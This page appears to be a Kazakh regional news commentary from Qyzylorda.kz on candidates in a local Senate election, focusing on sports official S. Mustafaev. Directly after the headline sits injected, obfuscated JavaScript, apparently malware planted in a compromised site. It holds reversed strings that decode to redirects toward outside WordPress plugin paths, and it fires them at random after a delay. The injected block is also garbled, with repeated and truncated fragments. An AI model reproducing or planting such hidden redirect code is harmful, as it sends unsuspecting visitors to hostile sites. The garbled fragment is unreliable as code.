С.Мұстафаев Сенатор болады ма?

d0bcd183d181d182d0b0d184d0b0d0b5d0b2$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/d0bcd183d181d182d0b0d184d0b0d0b5d0b2.jpg» width=»142″ height=»301″ />Осы айдың 19-да өтетін сенатор сайлауына Сыр бойынан 9 кандидат ұсынылып, оның жартысы тіркелгені белгілі.

Бүгінгі күні былайғы жұрт сенатор кім болатынын іштей сезгенімен кей кандидаттардың неден үміттенгенін білгісі келетіні анық.

Орталықтан алыстау, сертификаты бар сарапшысы мен болжаушысы жоқтың қасы біздің Қызылорда сияқты қалаларда ресми емес дерек көздерінің көп дәйек келтіретіні дәлелденбейтін аксиома.

Сол аксиома бойынша кандидат болып тіркелгендердің бірі облыс әкімінің орынбасары Мұрат Мұхамедов қалада да, далада да, жетімханада да, күріш алқабында да елмен кездесулер өткізіп, сенаторлықтан шын үмітті екендігін байқатуда. Одан бөлек оны қолдап, бірге оқыған, сонау Алматыдағы курстасы, Астанадағы әріптес ағасы тағы сол сияқты бұл кандидаттың ертеңінен дәмелілер қоштау сөз айтып, бәйек болып жатыр. Қоштау, марапаттау, жарамсақтанусыз-ақ бұл сайлау оныкі екенін әркім іші сезеді. Тек әншейін, қарап қалмайық дегендей қамдану болса керек. Әйтпесе қолпаштарға, жарамсақтарға кандидат мұқтаж болып отырған жоқ секілді. Осы уақытқа дейін жиған-тергені, өз абырой-беделі өзіне жетерлік.

Ал, енді облыстық мұғалімдер біліктілігін жетілдіру институтының директоры Б.Елеусінов пен Шиелі кенті әкімі М.Әлсеріковтікі досқа дос, жерлеске жерлес көңіл екені белгілі. “Нұрай” ЖШС директоры С.Алшынбаев бұдан бұрын да облыстық мәслихат депутаттығына арғы беттегі ауылдардан бақ сынады. Бұл жолы тағы да үлкен сайлауға түсті. Өзі көпке көрінгенді, көпке көп сөз айтқанды қаламайтын, есесіне құрылыс салып, оны жалға беруді жаны сүйетін С.Алшынбаевтың аржағында одан да бетер көзге көрінбегенімен “біз де бармыз, бізді де ұмытпаңдар” деп басқа біреу базына айтып тұрғандай.

Кандидаттар арасында саясатта да, билікте де, ғылымда да, қайраткерлікте де басқаларынан оқ бойы озық бір кандидаттан басқа өздеріне ерік берсе, тізгінді ала қашып, мен сенатор боламын деп теңесер ешкім байқалмағанымен, облыстық спорт және туризм басқармасының бастығы Садық Шоңмұрынұлы Мұстафаевтың төбе көрсетуі біршама ойланарлық.

Өзі басқарған саладағы игі жетістіктерімен, әсіресе, саланы қаржыландырудағы мол мүмкіндіктерімен, әрі Илья Ильин сияқты Пекин олимпиада чемпионын шығарғанымен өз әріптестері арасында шоң көрінетін Садық Шоңмұрынұлы негізгі кандидат болмағанмен қосалқы ойыншы болып қабаттасқаны бұл сайлаудан оның да таласы бар екенін байқатса керек… …

Бәлкім сенатор болмағанменен облыс әкімінің орынбасары М.Мұхамедовтың мұрагері болғысы келеді… …

Әлемнің бір жерінде көбелек қанатының дірілдегені, екінші бір жерде томар аударады дегендей, бұл сайлауға түскеннің бәрінің бір-бір дірілі бары анық.

«Qyzylorda.kz»

Leave a Reply

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Яндекс.Метрика